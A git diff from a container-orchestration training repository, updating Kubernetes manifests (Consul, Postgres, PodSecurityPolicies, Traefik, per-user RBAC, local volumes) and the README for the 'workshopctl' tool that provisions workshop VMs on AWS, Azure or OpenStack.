||||
- pods
|
||||
verbs:
|
||||
- get
|
||||
- list
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRoleBinding
|
||||
metadata:
|
||||
name: persistentconsul
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: ClusterRole
|
||||
name: persistentconsul
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: persistentconsul
|
||||
namespace: default
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ServiceAccount
|
||||
metadata:
|
||||
name: persistentconsul
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Service
|
||||
metadata:
|
||||
name: persistentconsul
|
||||
spec:
|
||||
ports:
|
||||
- port: 8500
|
||||
name: http
|
||||
selector:
|
||||
app: persistentconsul
|
||||
---
|
||||
apiVersion: apps/v1
|
||||
kind: StatefulSet
|
||||
metadata:
|
||||
name: persistentconsul
|
||||
spec:
|
||||
serviceName: persistentconsul
|
||||
replicas: 3
|
||||
selector:
|
||||
matchLabels:
|
||||
app: persistentconsul
|
||||
volumeClaimTemplates:
|
||||
- metadata:
|
||||
name: data
|
||||
spec:
|
||||
accessModes:
|
||||
- ReadWriteOnce
|
||||
resources:
|
||||
requests:
|
||||
storage: 1Gi
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: persistentconsul
|
||||
spec:
|
||||
serviceAccountName: persistentconsul
|
||||
affinity:
|
||||
podAntiAffinity:
|
||||
requiredDuringSchedulingIgnoredDuringExecution:
|
||||
- labelSelector:
|
||||
matchExpressions:
|
||||
- key: app
|
||||
operator: In
|
||||
values:
|
||||
- persistentconsul
|
||||
topologyKey: kubernetes.io/hostname
|
||||
terminationGracePeriodSeconds: 10
|
||||
containers:
|
||||
- name: consul
|
||||
image: "consul:1.6"
|
||||
volumeMounts:
|
||||
- name: data
|
||||
mountPath: /consul/data
|
||||
args:
|
||||
- "agent"
|
||||
- "-bootstrap-expect=3"
|
||||
- "-retry-join=provider=k8s label_selector=\"app=persistentconsul\""
|
||||
- "-client=0.0.0.0"
|
||||
- "-data-dir=/consul/data"
|
||||
- "-server"
|
||||
- "-ui"
|
||||
lifecycle:
|
||||
preStop:
|
||||
exec:
|
||||
command:
|
||||
- /bin/sh
|
||||
- -c
|
||||
- consul leave
|
||||
1192
k8s/portworx.yaml
1192
k8s/portworx.yaml
File diff suppressed because it is too large
Load Diff
@@ -12,12 +12,19 @@ spec:
|
||||
labels:
|
||||
app: postgres
|
||||
spec:
|
||||
schedulerName: stork
|
||||
#schedulerName: stork
|
||||
initContainers:
|
||||
- name: rmdir
|
||||
image: alpine
|
||||
volumeMounts:
|
||||
- mountPath: /vol
|
||||
name: postgres
|
||||
command: ["sh", "-c", "if [ -d /vol/lost+found ]; then rmdir /vol/lost+found; fi"]
|
||||
containers:
|
||||
- name: postgres
|
||||
image: postgres:10.5
|
||||
image: postgres:11
|
||||
volumeMounts:
|
||||
- mountPath: /var/lib/postgresql
|
||||
- mountPath: /var/lib/postgresql/data
|
||||
name: postgres
|
||||
volumeClaimTemplates:
|
||||
- metadata:
|
||||
|
||||
39
k8s/psp-privileged.yaml
Normal file
39
k8s/psp-privileged.yaml
Normal file
@@ -0,0 +1,39 @@
|
||||
---
|
||||
apiVersion: policy/v1beta1
|
||||
kind: PodSecurityPolicy
|
||||
metadata:
|
||||
name: privileged
|
||||
annotations:
|
||||
seccomp.security.alpha.kubernetes.io/allowedProfileNames: '*'
|
||||
spec:
|
||||
privileged: true
|
||||
allowPrivilegeEscalation: true
|
||||
allowedCapabilities:
|
||||
- '*'
|
||||
volumes:
|
||||
- '*'
|
||||
hostNetwork: true
|
||||
hostPorts:
|
||||
- min: 0
|
||||
max: 65535
|
||||
hostIPC: true
|
||||
hostPID: true
|
||||
runAsUser:
|
||||
rule: 'RunAsAny'
|
||||
seLinux:
|
||||
rule: 'RunAsAny'
|
||||
supplementalGroups:
|
||||
rule: 'RunAsAny'
|
||||
fsGroup:
|
||||
rule: 'RunAsAny'
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRole
|
||||
metadata:
|
||||
name: psp:privileged
|
||||
rules:
|
||||
- apiGroups: ['policy']
|
||||
resources: ['podsecuritypolicies']
|
||||
verbs: ['use']
|
||||
resourceNames: ['privileged']
|
||||
|
||||
38
k8s/psp-restricted.yaml
Normal file
38
k8s/psp-restricted.yaml
Normal file
@@ -0,0 +1,38 @@
|
||||
---
|
||||
apiVersion: extensions/v1beta1
|
||||
kind: PodSecurityPolicy
|
||||
metadata:
|
||||
annotations:
|
||||
apparmor.security.beta.kubernetes.io/allowedProfileNames: runtime/default
|
||||
apparmor.security.beta.kubernetes.io/defaultProfileName: runtime/default
|
||||
seccomp.security.alpha.kubernetes.io/allowedProfileNames: docker/default
|
||||
seccomp.security.alpha.kubernetes.io/defaultProfileName: docker/default
|
||||
name: restricted
|
||||
spec:
|
||||
allowPrivilegeEscalation: false
|
||||
fsGroup:
|
||||
rule: RunAsAny
|
||||
runAsUser:
|
||||
rule: RunAsAny
|
||||
seLinux:
|
||||
rule: RunAsAny
|
||||
supplementalGroups:
|
||||
rule: RunAsAny
|
||||
volumes:
|
||||
- configMap
|
||||
- emptyDir
|
||||
- projected
|
||||
- secret
|
||||
- downwardAPI
|
||||
- persistentVolumeClaim
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRole
|
||||
metadata:
|
||||
name: psp:restricted
|
||||
rules:
|
||||
- apiGroups: ['policy']
|
||||
resources: ['podsecuritypolicies']
|
||||
verbs: ['use']
|
||||
resourceNames: ['restricted']
|
||||
|
||||
@@ -6,7 +6,7 @@ metadata:
|
||||
creationTimestamp: null
|
||||
generation: 1
|
||||
labels:
|
||||
run: socat
|
||||
app: socat
|
||||
name: socat
|
||||
namespace: kube-system
|
||||
selfLink: /apis/extensions/v1beta1/namespaces/kube-system/deployments/socat
|
||||
@@ -14,7 +14,7 @@ spec:
|
||||
replicas: 1
|
||||
selector:
|
||||
matchLabels:
|
||||
run: socat
|
||||
app: socat
|
||||
strategy:
|
||||
rollingUpdate:
|
||||
maxSurge: 1
|
||||
@@ -24,7 +24,7 @@ spec:
|
||||
metadata:
|
||||
creationTimestamp: null
|
||||
labels:
|
||||
run: socat
|
||||
app: socat
|
||||
spec:
|
||||
containers:
|
||||
- args:
|
||||
@@ -49,7 +49,7 @@ kind: Service
|
||||
metadata:
|
||||
creationTimestamp: null
|
||||
labels:
|
||||
run: socat
|
||||
app: socat
|
||||
name: socat
|
||||
namespace: kube-system
|
||||
selfLink: /api/v1/namespaces/kube-system/services/socat
|
||||
@@ -60,7 +60,7 @@ spec:
|
||||
protocol: TCP
|
||||
targetPort: 80
|
||||
selector:
|
||||
run: socat
|
||||
app: socat
|
||||
sessionAffinity: None
|
||||
type: NodePort
|
||||
status:
|
||||
|
||||
@@ -6,13 +6,16 @@ metadata:
|
||||
namespace: kube-system
|
||||
---
|
||||
kind: DaemonSet
|
||||
apiVersion: extensions/v1beta1
|
||||
apiVersion: apps/v1
|
||||
metadata:
|
||||
name: traefik-ingress-controller
|
||||
namespace: kube-system
|
||||
labels:
|
||||
k8s-app: traefik-ingress-lb
|
||||
spec:
|
||||
selector:
|
||||
matchLabels:
|
||||
k8s-app: traefik-ingress-lb
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
@@ -26,7 +29,7 @@ spec:
|
||||
serviceAccountName: traefik-ingress-controller
|
||||
terminationGracePeriodSeconds: 60
|
||||
containers:
|
||||
- image: traefik
|
||||
- image: traefik:1.7
|
||||
name: traefik-ingress-lb
|
||||
ports:
|
||||
- name: http
|
||||
|
||||
33
k8s/users:jean.doe.yaml
Normal file
33
k8s/users:jean.doe.yaml
Normal file
@@ -0,0 +1,33 @@
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ServiceAccount
|
||||
metadata:
|
||||
name: jean.doe
|
||||
namespace: users
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRole
|
||||
metadata:
|
||||
name: users:jean.doe
|
||||
rules:
|
||||
- apiGroups: [ certificates.k8s.io ]
|
||||
resources: [ certificatesigningrequests ]
|
||||
verbs: [ create ]
|
||||
- apiGroups: [ certificates.k8s.io ]
|
||||
resourceNames: [ users:jean.doe ]
|
||||
resources: [ certificatesigningrequests ]
|
||||
verbs: [ get, create, delete, watch ]
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRoleBinding
|
||||
metadata:
|
||||
name: users:jean.doe
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: ClusterRole
|
||||
name: users:jean.doe
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: jean.doe
|
||||
namespace: users
|
||||
|
||||
70
k8s/volumes-for-consul.yaml
Normal file
70
k8s/volumes-for-consul.yaml
Normal file
@@ -0,0 +1,70 @@
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: PersistentVolume
|
||||
metadata:
|
||||
name: consul-node2
|
||||
annotations:
|
||||
node: node2
|
||||
spec:
|
||||
capacity:
|
||||
storage: 10Gi
|
||||
accessModes:
|
||||
- ReadWriteOnce
|
||||
persistentVolumeReclaimPolicy: Delete
|
||||
local:
|
||||
path: /mnt/consul
|
||||
nodeAffinity:
|
||||
required:
|
||||
nodeSelectorTerms:
|
||||
- matchExpressions:
|
||||
- key: kubernetes.io/hostname
|
||||
operator: In
|
||||
values:
|
||||
- node2
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: PersistentVolume
|
||||
metadata:
|
||||
name: consul-node3
|
||||
annotations:
|
||||
node: node3
|
||||
spec:
|
||||
capacity:
|
||||
storage: 10Gi
|
||||
accessModes:
|
||||
- ReadWriteOnce
|
||||
persistentVolumeReclaimPolicy: Delete
|
||||
local:
|
||||
path: /mnt/consul
|
||||
nodeAffinity:
|
||||
required:
|
||||
nodeSelectorTerms:
|
||||
- matchExpressions:
|
||||
- key: kubernetes.io/hostname
|
||||
operator: In
|
||||
values:
|
||||
- node3
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: PersistentVolume
|
||||
metadata:
|
||||
name: consul-node4
|
||||
annotations:
|
||||
node: node4
|
||||
spec:
|
||||
capacity:
|
||||
storage: 10Gi
|
||||
accessModes:
|
||||
- ReadWriteOnce
|
||||
persistentVolumeReclaimPolicy: Delete
|
||||
local:
|
||||
path: /mnt/consul
|
||||
nodeAffinity:
|
||||
required:
|
||||
nodeSelectorTerms:
|
||||
- matchExpressions:
|
||||
- key: kubernetes.io/hostname
|
||||
operator: In
|
||||
values:
|
||||
- node4
|
||||
|
||||
@@ -7,9 +7,9 @@ workshop.
|
||||
|
||||
|
||||
## 1. Prerequisites
|
||||
|
||||
Virtualbox, Vagrant and Ansible
|
||||
|
||||
|
||||
- Virtualbox: https://www.virtualbox.org/wiki/Downloads
|
||||
|
||||
- Vagrant: https://www.vagrantup.com/downloads.html
|
||||
@@ -25,19 +25,20 @@ Virtualbox, Vagrant and Ansible
|
||||
|
||||
$ git clone --recursive https://github.com/ansible/ansible.git
|
||||
$ cd ansible
|
||||
$ git checkout stable-2.0.0.1
|
||||
$ git checkout stable-{{ getStableVersionFromAnsibleProject }}
|
||||
$ git submodule update
|
||||
|
||||
- source the setup script to make Ansible available on this terminal session:
|
||||
|
||||
$ source path/to/your-ansible-clone/hacking/env-setup
|
||||
|
||||
- you need to repeat the last step everytime you open a new terminal session
|
||||
- you need to repeat the last step every time you open a new terminal session
|
||||
and want to use any Ansible command (but you'll probably only need to run
|
||||
it once).
|
||||
|
||||
|
||||
## 2. Preparing the environment
|
||||
Change into directory that has your Vagrantfile
|
||||
|
||||
Run the following commands:
|
||||
|
||||
@@ -66,6 +67,14 @@ will reflect inside the instance.
|
||||
|
||||
- Depending on the Vagrant version, `sudo apt-get install bsdtar` may be needed
|
||||
|
||||
- If you get an error like "no Vagrant file found" or you have a file but "cannot open base box" when running `vagrant up`,
|
||||
chances are good you not in the correct directory.
|
||||
Make sure you are in sub directory named "prepare-local". It has all the config files required by ansible, vagrant and virtualbox
|
||||
|
||||
- If you are using Python 3.7, running the ansible-playbook provisioning, see an error like "SyntaxError: invalid syntax" and it mentions
|
||||
the word "async", you need to upgrade your Ansible version to 2.6 or higher to resolve the keyword conflict.
|
||||
https://github.com/ansible/ansible/issues/42105
|
||||
|
||||
- If you get strange Ansible errors about dependencies, try to check your pip
|
||||
version with `pip --version`. The current version is 8.1.1. If your pip is
|
||||
older than this, upgrade it with `sudo pip install --upgrade pip`, restart
|
||||
|
||||
@@ -1,33 +1,53 @@
|
||||
# Trainer tools to create and prepare VMs for Docker workshops on AWS or Azure
|
||||
# Trainer tools to create and prepare VMs for Docker workshops
|
||||
|
||||
These tools can help you to create VMs on:
|
||||
|
||||
- Azure
|
||||
- EC2
|
||||
- OpenStack
|
||||
|
||||
## Prerequisites
|
||||
|
||||
- [Docker](https://docs.docker.com/engine/installation/)
|
||||
- [Docker Compose](https://docs.docker.com/compose/install/)
|
||||
- [Parallel SSH](https://code.google.com/archive/p/parallel-ssh/) (on a Mac: `brew install pssh`) - the configuration scripts require this
|
||||
- [Parallel SSH](https://code.google.com/archive/p/parallel-ssh/) (on a Mac: `brew install pssh`)
|
||||
|
||||
Depending on the infrastructure that you want to use, you also need to install
|
||||
the Azure CLI, the AWS CLI, or terraform (for OpenStack deployment).
|
||||
|
||||
And if you want to generate printable cards:
|
||||
|
||||
- [pyyaml](https://pypi.python.org/pypi/PyYAML) (on a Mac: `brew install pyyaml`)
|
||||
- [jinja2](https://pypi.python.org/pypi/Jinja2) (on a Mac: `brew install jinja2`)
|
||||
- [pyyaml](https://pypi.python.org/pypi/PyYAML)
|
||||
- [jinja2](https://pypi.python.org/pypi/Jinja2)
|
||||
|
||||
You can install them with pip (perhaps with `pip install --user`, or even use `virtualenv` if that's your thing).
|
||||
|
||||
These require Python 3. If you are on a Mac, see below for specific instructions on setting up
|
||||
Python 3 to be the default Python on a Mac. In particular, if you installed `mosh`, Homebrew
|
||||
may have changed your default Python to Python 2.
|
||||
|
||||
## General Workflow
|
||||
|
||||
- fork/clone repo
|
||||
- set required environment variables
|
||||
- create an infrastructure configuration in the `prepare-vms/infra` directory
|
||||
(using one of the example files in that directory)
|
||||
- create your own setting file from `settings/example.yaml`
|
||||
- if necessary, increase allowed open files: `ulimit -Sn 10000`
|
||||
- run `./workshopctl` commands to create instances, install docker, setup each users environment in node1, other management tasks
|
||||
- run `./workshopctl cards` command to generate PDF for printing handouts of each users host IP's and login info
|
||||
- run `./workshopctl start` to create instances
|
||||
- run `./workshopctl deploy` to install Docker and setup environment
|
||||
- run `./workshopctl kube` (if you want to install and setup Kubernetes)
|
||||
- run `./workshopctl cards` (if you want to generate PDF for printing handouts of each users host IP's and login info)
|
||||
- run `./workshopctl stop` at the end of the workshop to terminate instances
|
||||
|
||||
## Clone/Fork the Repo, and Build the Tools Image
|
||||
|
||||
The Docker Compose file here is used to build a image with all the dependencies to run the `./workshopctl` commands and optional tools. Each run of the script will check if you have those dependencies locally on your host, and will only use the container if you're [missing a dependency](workshopctl#L5).
|
||||
|
||||
$ git clone https://github.com/jpetazzo/orchestration-workshop.git
|
||||
$ cd orchestration-workshop/prepare-vms
|
||||
$ git clone https://github.com/jpetazzo/container.training
|
||||
$ cd container.training/prepare-vms
|
||||
$ docker-compose build
|
||||
|
||||
|
||||
## Preparing to Run `./workshopctl`
|
||||
|
||||
### Required AWS Permissions/Info
|
||||
@@ -36,53 +56,74 @@ The Docker Compose file here is used to build a image with all the dependencies
|
||||
- Using a non-default VPC or Security Group isn't supported out of box yet, so you will have to customize `lib/commands.sh` if you want to change that.
|
||||
- These instances will assign the default VPC Security Group, which does not open any ports from Internet by default. So you'll need to add Inbound rules for `SSH | TCP | 22 | 0.0.0.0/0` and `Custom TCP Rule | TCP | 8000 - 8002 | 0.0.0.0/0`, or run `./workshopctl opensg` which opens up all ports.
|
||||
|
||||
### Required Environment Variables
|
||||
### Create your `infra` file
|
||||
|
||||
- `AWS_ACCESS_KEY_ID`
|
||||
- `AWS_SECRET_ACCESS_KEY`
|
||||
- `AWS_DEFAULT_REGION`
|
||||
You need to do this only once. (On AWS, you can create one `infra`
|
||||
file per region.)
|
||||
|
||||
If you're not using AWS, set these to placeholder values:
|
||||
Make a copy of one of the example files in the `infra` directory.
|
||||
|
||||
For instance:
|
||||
|
||||
```bash
|
||||
cp infra/example.aws infra/aws-us-west-2
|
||||
```
|
||||
export AWS_ACCESS_KEY_ID="foo"
|
||||
export AWS_SECRET_ACCESS_KEY="foo"
|
||||
export AWS_DEFAULT_REGION="foo"
|
||||
```
|
||||
|
||||
Edit your infrastructure file to customize it.
|
||||
You will probably need to put your cloud provider credentials,
|
||||
select region...
|
||||
|
||||
If you don't have the `aws` CLI installed, you will get a warning that it's a missing dependency. If you're not using AWS you can ignore this.
|
||||
|
||||
### Update/copy `settings/example.yaml`
|
||||
### Create your `settings` file
|
||||
|
||||
Then pass `settings/YOUR_WORKSHOP_NAME-settings.yaml` as an argument to `./workshopctl deploy`, `./workshopctl cards`, etc.
|
||||
Similarly, pick one of the files in `settings` and copy it
|
||||
to customize it.
|
||||
|
||||
./workshopctl cards 2016-09-28-00-33-bret settings/orchestration.yaml
|
||||
For instance:
|
||||
|
||||
```bash
|
||||
cp settings/example.yaml settings/myworkshop.yaml
|
||||
```
|
||||
|
||||
You're all set!
|
||||
|
||||
## `./workshopctl` Usage
|
||||
|
||||
```
|
||||
workshopctl - the orchestration workshop swiss army knife
|
||||
Commands:
|
||||
ami Show the AMI that will be used for deployment
|
||||
amis List Ubuntu AMIs in the current region
|
||||
build Build the Docker image to run this program in a container
|
||||
cards Generate ready-to-print cards for a batch of VMs
|
||||
deploy Install Docker on a bunch of running VMs
|
||||
ec2quotas Check our EC2 quotas (max instances)
|
||||
help Show available commands
|
||||
ids List the instance IDs belonging to a given tag or token
|
||||
ips List the IP addresses of the VMs for a given tag or token
|
||||
kube Setup kubernetes clusters with kubeadm (must be run AFTER deploy)
|
||||
kubetest Check that all notes are reporting as Ready
|
||||
list List available batches in the current region
|
||||
opensg Open the default security group to ALL ingress traffic
|
||||
pull_images Pre-pull a bunch of Docker images
|
||||
retag Apply a new tag to a batch of VMs
|
||||
start Start a batch of VMs
|
||||
status List instance status for a given batch
|
||||
stop Stop (terminate, shutdown, kill, remove, destroy...) instances
|
||||
test Run tests (pre-flight checks) on a batch of VMs
|
||||
wrap Run this program in a container
|
||||
build Build the Docker image to run this program in a container
|
||||
cards Generate ready-to-print cards for a group of VMs
|
||||
deploy Install Docker on a bunch of running VMs
|
||||
disableaddrchecks Disable source/destination IP address checks
|
||||
disabledocker Stop Docker Engine and don't restart it automatically
|
||||
helmprom Install Helm and Prometheus
|
||||
help Show available commands
|
||||
ids (FIXME) List the instance IDs belonging to a given tag or token
|
||||
kubebins Install Kubernetes and CNI binaries but don't start anything
|
||||
kubereset Wipe out Kubernetes configuration on all nodes
|
||||
kube Setup kubernetes clusters with kubeadm (must be run AFTER deploy)
|
||||
kubetest Check that all nodes are reporting as Ready
|
||||
listall List VMs running on all configured infrastructures
|
||||
list List available groups for a given infrastructure
|
||||
netfix Disable GRO and run a pinger job on the VMs
|
||||
opensg Open the default security group to ALL ingress traffic
|
||||
ping Ping VMs in a given tag, to check that they have network access
|
||||
pssh Run an arbitrary command on all nodes
|
||||
pull_images Pre-pull a bunch of Docker images
|
||||
quotas Check our infrastructure quotas (max instances)
|
||||
remap_nodeports Remap NodePort range to 10000-10999
|
||||
retag (FIXME) Apply a new tag to a group of VMs
|
||||
ssh Open an SSH session to the first node of a tag
|
||||
start Start a group of VMs
|
||||
stop Stop (terminate, shutdown, kill, remove, destroy...) instances
|
||||
tags List groups of VMs known locally
|
||||
test Run tests (pre-flight checks) on a group of VMs
|
||||
weavetest Check that weave seems properly setup
|
||||
webssh Install a WEB SSH server on the machines (port 1080)
|
||||
wrap Run this program in a container
|
||||
www Run a web server to access card HTML and PDF
|
||||
```
|
||||
|
||||
### Summary of What `./workshopctl` Does For You
|
||||
@@ -95,22 +136,22 @@ wrap Run this program in a container
|
||||
- During `start` it will add your default local SSH key to all instances under the `ubuntu` user.
|
||||
- During `deploy` it will create the `docker` user with password `training`, which is printing on the cards for students. This can be configured with the `docker_user_password` property in the settings file.
|
||||
|
||||
### Example Steps to Launch a Batch of AWS Instances for a Workshop
|
||||
### Example Steps to Launch a group of AWS Instances for a Workshop
|
||||
|
||||
- Run `./workshopctl start N` Creates `N` EC2 instances
|
||||
- Run `./workshopctl start --infra infra/aws-us-east-2 --settings/myworkshop.yaml --count 60` to create 60 EC2 instances
|
||||
- Your local SSH key will be synced to instances under `ubuntu` user
|
||||
- AWS instances will be created and tagged based on date, and IP's stored in `prepare-vms/tags/`
|
||||
- Run `./workshopctl deploy TAG settings/somefile.yaml` to run `lib/postprep.py` via parallel-ssh
|
||||
- Run `./workshopctl deploy TAG` to run `lib/postprep.py` via parallel-ssh
|
||||
- If it errors or times out, you should be able to rerun
|
||||
- Requires good connection to run all the parallel SSH connections, up to 100 parallel (ProTip: create dedicated management instance in same AWS region where you run all these utils from)
|
||||
- Run `./workshopctl pull_images TAG` to pre-pull a bunch of Docker images to the instances
|
||||
- Run `./workshopctl cards TAG settings/somefile.yaml` generates PDF/HTML files to print and cut and hand out to students
|
||||
- Run `./workshopctl cards TAG` generates PDF/HTML files to print and cut and hand out to students
|
||||
- *Have a great workshop*
|
||||
- Run `./workshopctl stop TAG` to terminate instances.
|
||||
|
||||
### Example Steps to Launch Azure Instances
|
||||
|
||||
- Install the [Azure CLI](https://docs.microsoft.com/en-us/cli/azure/install-azure-cli?view=azure-cli-latest) and authenticate with a valid account
|
||||
- Install the [Azure CLI](https://docs.microsoft.com/en-us/cli/azure/install-azure-cli?view=azure-cli-latest) and authenticate with a valid account (`az login`)
|
||||
- Customize `azuredeploy.parameters.json`
|
||||
- Required:
|
||||
- Provide the SSH public key you plan to use for instance configuration
|
||||
@@ -155,27 +196,16 @@ az group delete --resource-group workshop
|
||||
|
||||
### Example Steps to Configure Instances from a non-AWS Source
|
||||
|
||||
- Launch instances via your preferred method. You'll need to get the instance IPs and be able to ssh into them.
|
||||
- Set placeholder values for [AWS environment variable settings](#required-environment-variables).
|
||||
- Choose a tag. It could be an event name, datestamp, etc. Ensure you have created a directory for your tag: `prepare-vms/tags/<tag>/`
|
||||
- If you have not already generated a file with the IPs to be configured:
|
||||
- The file should be named `prepare-vms/tags/<tag>/ips.txt`
|
||||
- Format is one IP per line, no other info needed.
|
||||
- Ensure the settings file is as desired (especially the number of nodes): `prepare-vms/settings/kube101.yaml`
|
||||
- For a tag called `myworkshop`, configure instances: `workshopctl deploy myworkshop settings/kube101.yaml`
|
||||
- Optionally, configure Kubernetes clusters of the size in the settings: `workshopctl kube myworkshop`
|
||||
- Optionally, test your Kubernetes clusters. They may take a little time to become ready: `workshopctl kubetest myworkshop`
|
||||
- Generate cards to print and hand out: `workshopctl cards myworkshop settings/kube101.yaml`
|
||||
- Print the cards file: `prepare-vms/tags/myworkshop/ips.html`
|
||||
|
||||
|
||||
## Other Tools
|
||||
|
||||
### Deploying your SSH key to all the machines
|
||||
|
||||
- Make sure that you have SSH keys loaded (`ssh-add -l`).
|
||||
- Source `rc`.
|
||||
- Run `pcopykey`.
|
||||
- Copy `infra/example.generic` to `infra/generic`
|
||||
- Run `./workshopctl start --infra infra/generic --settings settings/...yaml`
|
||||
- Note the `prepare-vms/tags/TAG/` path that has been auto-created.
|
||||
- Launch instances via your preferred method. You'll need to get the instance IPs and be able to SSH into them.
|
||||
- Edit the file `prepare-vms/tags/TAG/ips.txt`, it should list the IP addresses of the VMs (one per line, without any comments or other info)
|
||||
- Continue deployment of cluster configuration with `./workshopctl deploy TAG`
|
||||
- Optionally, configure Kubernetes clusters of the size in the settings: workshopctl kube `TAG`
|
||||
- Optionally, test your Kubernetes clusters. They may take a little time to become ready: workshopctl kubetest `TAG`
|
||||
- Generate cards to print and hand out: workshopctl cards `TAG`
|
||||
- Print the cards file: prepare-vms/tags/`TAG`/ips.html
|
||||
|
||||
|
||||
## Even More Details
|
||||
@@ -188,7 +218,7 @@ To see which local key will be uploaded, run `ssh-add -l | grep RSA`.
|
||||
|
||||
#### Instance + tag creation
|
||||
|
||||
10 VMs will be started, with an automatically generated tag (timestamp + your username).
|
||||
The VMs will be started, with an automatically generated tag (timestamp + your username).
|
||||
|
||||
Your SSH key will be added to the `authorized_keys` of the ubuntu user.
|
||||
|
||||
@@ -196,15 +226,11 @@ Your SSH key will be added to the `authorized_keys` of the ubuntu user.
|
||||
|
||||
Following the creation of the VMs, a text file will be created containing a list of their IPs.
|
||||
|
||||
This ips.txt file will be created in the $TAG/ directory and a symlink will be placed in the working directory of the script.
|
||||
|
||||
If you create new VMs, the symlinked file will be overwritten.
|
||||
|
||||
#### Deployment
|
||||
|
||||
Instances can be deployed manually using the `deploy` command:
|
||||
|
||||
$ ./workshopctl deploy TAG settings/somefile.yaml
|
||||
$ ./workshopctl deploy TAG
|
||||
|
||||
The `postprep.py` file will be copied via parallel-ssh to all of the VMs and executed.
|
||||
|
||||
@@ -214,7 +240,7 @@ The `postprep.py` file will be copied via parallel-ssh to all of the VMs and exe
|
||||
|
||||
#### Generate cards
|
||||
|
||||
$ ./workshopctl cards TAG settings/somefile.yaml
|
||||
$ ./workshopctl cards TAG
|
||||
|
||||
If you want to generate both HTML and PDF cards, install [wkhtmltopdf](https://wkhtmltopdf.org/downloads.html); without that installed, only HTML cards will be generated.
|
||||
|
||||
@@ -222,13 +248,11 @@ If you don't have `wkhtmltopdf` installed, you will get a warning that it is a m
|
||||
|
||||
#### List tags
|
||||
|
||||
$ ./workshopctl list
|
||||
$ ./workshopctl list infra/some-infra-file
|
||||
|
||||
#### List VMs
|
||||
$ ./workshopctl listall
|
||||
|
||||
$ ./workshopctl list TAG
|
||||
|
||||
This will print a human-friendly list containing some information about each instance.
|
||||
$ ./workshopctl tags
|
||||
|
||||
#### Stop and destroy VMs
|
||||
|
||||
@@ -238,3 +262,32 @@ This will print a human-friendly list containing some information about each ins
|
||||
|
||||
- Don't write to bash history in system() in postprep
|
||||
- compose, etc version inconsistent (int vs str)
|
||||
|
||||
## Making sure Python3 is the default (Mac only)
|
||||
|
||||
Check the `/usr/local/bin/python` symlink. It should be pointing to
|
||||
`/usr/local/Cellar/python/3`-something. If it isn't, follow these
|
||||
instructions.
|
||||
|
||||
1) Verify that Python 3 is installed.
|
||||
|
||||
```
|
||||
ls -la /usr/local/Cellar/Python
|
||||
```
|
||||
|
||||
You should see one or more versions of Python 3. If you don't,
|
||||
install it with `brew install python`.
|
||||
|
||||
2) Verify that `python` points to Python3.
|
||||
|
||||
```
|
||||
ls -la /usr/local/bin/python
|
||||
```
|
||||
|
||||
If this points to `/usr/local/Cellar/python@2`, then we'll need to change it.
|
||||
|
||||
```
|
||||
rm /usr/local/bin/python
|
||||
ln -s /usr/local/Cellar/Python/xxxx /usr/local/bin/python
|
||||
# where xxxx is the most recent Python 3 version you saw above
|
||||
```
|
||||
|
||||
@@ -1,106 +0,0 @@
|
||||
{# Feel free to customize or override anything in there! #}
|
||||
{%- set url = "http://container.training/" -%}
|
||||
{%- set pagesize = 12 -%}
|
||||
{%- if clustersize == 1 -%}
|
||||
{%- set workshop_name = "Docker workshop" -%}
|
||||
{%- set cluster_or_machine = "machine" -%}
|
||||
{%- set this_or_each = "this" -%}
|
||||
{%- set machine_is_or_machines_are = "machine is" -%}
|
||||
{%- set image_src = "https://s3-us-west-2.amazonaws.com/www.breadware.com/integrations/docker.png" -%}
|
||||
{%- else -%}
|
||||
{%- set workshop_name = "orchestration workshop" -%}
|
||||
{%- set cluster_or_machine = "cluster" -%}
|
||||
{%- set this_or_each = "each" -%}
|
||||
{%- set machine_is_or_machines_are = "machines are" -%}
|
||||
{%- set image_src_swarm = "https://cdn.wp.nginx.com/wp-content/uploads/2016/07/docker-swarm-hero2.png" -%}
|
||||
{%- set image_src_kube = "https://avatars1.githubusercontent.com/u/13629408" -%}
|
||||
{%- set image_src = image_src_swarm -%}
|
||||
{%- endif -%}
|
||||
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
|
||||
<html>
|
||||
<head><style>
|
||||
body, table {
|
||||
margin: 0;
|
||||
padding: 0;
|
||||
line-height: 1em;
|
||||
font-size: 14px;
|
||||
}
|
||||
|
||||
table {
|
||||
border-spacing: 0;
|
||||
margin-top: 0.4em;
|
||||
margin-bottom: 0.4em;
|
||||
border-left: 0.8em double grey;
|
||||
padding-left: 0.4em;
|
||||
}
|
||||
|
||||
div {
|
||||
float: left;
|
||||
border: 1px dotted black;
|
||||
padding-top: 1%;
|
||||
padding-bottom: 1%;
|
||||
/* columns * (width+left+right) < 100% */
|
||||
width: 21.5%;
|
||||
padding-left: 1.5%;
|
||||
padding-right: 1.5%;
|
||||
}
|
||||
|
||||
p {
|
||||
margin: 0.4em 0 0.4em 0;
|
||||
}
|
||||
|
||||
img {
|
||||
height: 4em;
|
||||
float: right;
|
||||
margin-right: -0.4em;
|
||||
}
|
||||
|
||||
.logpass {
|
||||
font-family: monospace;
|
||||
font-weight: bold;
|
||||
}
|
||||
|
||||
.pagebreak {
|
||||
page-break-after: always;
|
||||
clear: both;
|
||||
display: block;
|
||||
height: 8px;
|
||||
}
|
||||
</style></head>
|
||||
<body>
|
||||
{% for cluster in clusters %}
|
||||
{% if loop.index0>0 and loop.index0%pagesize==0 %}
|
||||
<span class="pagebreak"></span>
|
||||
{% endif %}
|
